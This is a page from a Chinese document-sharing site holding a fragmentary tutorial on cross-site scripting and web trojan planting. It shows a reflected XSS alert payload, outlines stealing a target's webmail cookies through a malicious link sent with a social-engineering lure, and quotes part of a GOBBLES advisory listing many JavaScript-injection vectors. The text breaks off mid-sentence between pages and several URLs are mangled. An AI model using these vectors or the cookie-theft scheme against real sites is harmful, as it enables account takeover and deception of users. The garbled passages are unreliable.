欢迎来到天天文库
浏览记录
ID:9724459
大小:63.50 KB
页数:8页
时间:2018-05-06
《简单分析跨站脚本攻击挂马利用》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库。
1、简单分析跨站脚本攻击挂马利用~教育资源库 随着网络应用的普及,跨站脚本攻击漏洞经常在一些安全站点发布,这里笔者将整理一些对XSS跨站挂马的一些看法,错误之处请多指点。 什么是跨站脚本(XSS)? 所谓跨站脚本攻击是指在远程L JavaScript(本文讨论) VBScript ActiveX Flash 浅析XSS漏洞 许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或有其他类型的错误时,出错信息会通过一个显示错误内容的html页面发送到给访问者。例如:404错误,提示页面不存在。 我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成
2、因,我们还是仔细看一下。 例:.somesite.tld/cgi-bin/program.cgi?page=dol 该URL指向的连接是有效的,但是如果我们把后面的dol替换成brainrae.html,一个包含404错误信息的页面将反馈给访问者的浏览器。这里我们需要思考,错误信息是如何写入到html文件里呢? 注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一些Javascript代码到页面里。 当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,XSS_Vuln_Testing。 这个例子只是一个XSS漏洞的简单演示,并无实际意义,只用以说明问
3、题所在。 下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404错误页面中,结果创建了一个页面,如下: <html><b>404</b>-<script>alert(XSS_Vuln_Testing)</script>NotFound!</html> 其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。 利用XSS 如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服
4、务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html页面中。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。 实例: 假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是A。 已知某存在XSS漏洞的URL.myemailserver.tld/cgi-bin/neyemailserver.tld/cgi-bin/neyemailserver.tld/cgi-bin/neail地址,并了解cookies的作用。那么我们可以给A发送一个恶意连接,来从A机器中的cookie信息里获得
5、有价值的信息。这里我们会利用到一些基本的社会工程欺骗,想办法让A访问myemailserver.tld站点发表的文章,如,亲爱的A,美女图片快来欣赏? 那么当A访问.myemailserver.tld/cgi-bin/neail服务器的登陆页面,挂到其他的系统上,诱使用户登陆恶意系统页面,最终获取对方身份信息。总之,这里需要一些社会工程学欺骗,要耐心。 把javascript脚本插入:GOBBLESSECURITYADVISORY#33 Hereisacut-n-pastecollectionoftypicalJavaScript-injectionhacks youmay
6、derivesomegleefromplayingouseover=[code]> <imgsrc=javascript:[code]> &l123下一页友情提醒:,特别!t;imgdynsrc=javascript:[code]>[IE] <inputtype=imagedynsrc=javascript:[code]>[IE] <bgsoundsrc=javascript:[code]>[IE] <script>[code]</script> {[code]};[N4] <imgsr
7、c={[code]};>[N4] <linkrel=stylesheethref=javascript:[code]> <iframesrc=vbscript:[code]>[IE] <imgsrc=mocha:[code]>[N4] <imgsrc=livescript:[code]>[N4] <ahref=about:<script>[code]</script>> <metaht
此文档下载收益归作者所有